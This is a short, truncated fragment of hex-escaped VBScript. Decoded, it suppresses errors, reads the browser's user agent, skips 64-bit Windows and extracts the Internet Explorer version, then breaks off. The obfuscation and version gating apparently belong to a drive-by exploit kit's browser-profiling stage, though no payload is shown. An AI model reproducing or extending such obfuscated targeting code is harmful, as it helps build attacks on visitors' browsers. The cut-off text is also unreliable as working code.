\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x69\\x6E\\x66\\x6F\\x3D\\x4E\\x61\\x76\\x69\\x67\\x61\\x74\\x6F\\x72\\x2E\\x55\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x57\\x69\\x6E\\x36\\x34\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\\x43\\x49\\x6E\\x74\\x28\\x4D\\x69\\x64\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x49\\x6E\\x53\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x20\\x2B\\x20\\x35\\x2C\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x